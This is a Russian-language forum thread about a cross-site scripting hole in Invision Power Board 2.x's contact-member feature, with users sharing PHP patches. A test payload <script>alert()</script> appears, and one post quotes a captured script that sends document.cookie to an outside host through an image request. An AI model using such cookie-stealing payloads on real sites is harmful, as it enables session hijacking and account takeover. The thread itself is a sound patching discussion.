Перейти к контенту
  • 0

Уязвимость

Skull

Спросил Skull,

 Поделиться

Вопрос

12 ответов на этот вопрос

Рекомендуемые сообщения

  • 0
sM1Le

sM1Le

Опубликовано
Опубликовано
http://www.security.nnov.ru/Ldocument661.html

 

У меня на 2.1.4 со всеми багфиксами, alert без вопросов выскочил :D

<script>alert()</script>

У нас уже пофиксено как дня 4 ;)

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Skull

Skull

Опубликовано
  • Автор
Опубликовано
Ну это понятно, просто до не клиентов (потенциальных клиентов) тоже донести хотелось, так как сам случайно узнал.
Ссылка на комментарий
Поделиться на других сайтах
  • 0
~* L O V E R *~

~* L O V E R *~

Опубликовано
Опубликовано

Ничего себе уязвимость, вот это дырка. Актуальна кстати похоже во всех версиях (на IPB 2.0.x работает).

Уязвимость позволяет использовать любые html теги :D

 

Лично я пофиксил, поставив чтобы жалоба отправлялась не на РП, а на мыло.

 

У нас уже пофиксено как дня 4

Вот интересно о скольких дырках в безопасности обычные пользователи так еще и не знают.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
naka

naka

Опубликовано
Опубликовано

Возможное исправление на 2.1.x (с)казал PALADIN :D

 

В файле

./sources/action_public/misc/contact_member.php

 

найти Код

$this->lib->msg_post = $this->email->message;

 

 

 

заменить на Код

$this->lib->msg_post = $this->ipsclass->clean_evil_tags($this->ipsclass->parse_clean_value($this->email->message));

Ссылка на комментарий
Поделиться на других сайтах
  • 0
xRay

xRay

Опубликовано
Опубликовано

Ну а для 2.0.х тогда так будет

 

в файле sources/misc/contact_member.php

 

находим:

$this->lib->msg_post	= $this->email->message;

 

заменяем на:

$this->lib->msg_post	= $std->clean_evil_tags($std->clean_value($this->email->message));

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Fox Mulder

Fox Mulder

Опубликовано
Опубликовано

Спасибо за помощь. Пофиксили вроде!

А кто-то может сказать что этот засланный скрипт сделал, а то я чота слабо понимаю?

 

<script>img = new Image(); img.src = "http://s.netsec.ru/lol/pic.gif?"+document.cookie;</script>

Ссылка на комментарий
Поделиться на других сайтах
  • 0
xRay

xRay

Опубликовано
Опубликовано

Уже не в первый раз убеждаюсь что береженого бог бережет :D Ребят защищиайте вход в админку еще и Апачем, в смысле что,s Апач пароль тряс на входе в админку пароль. В этом случае если и пролезут в базу через SQL-иньекцию то хрен им ;) в админку им не попасть. Максимум это смогут похулиганить на самом форуме пользуясь админо-модерскими полномочиями.

 

Сорьки вырвалось... :)

Ссылка на комментарий
Поделиться на других сайтах
Гость
Эта тема закрыта для публикации сообщений.
 Поделиться
Перейти к списку вопросов
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.

  Согласен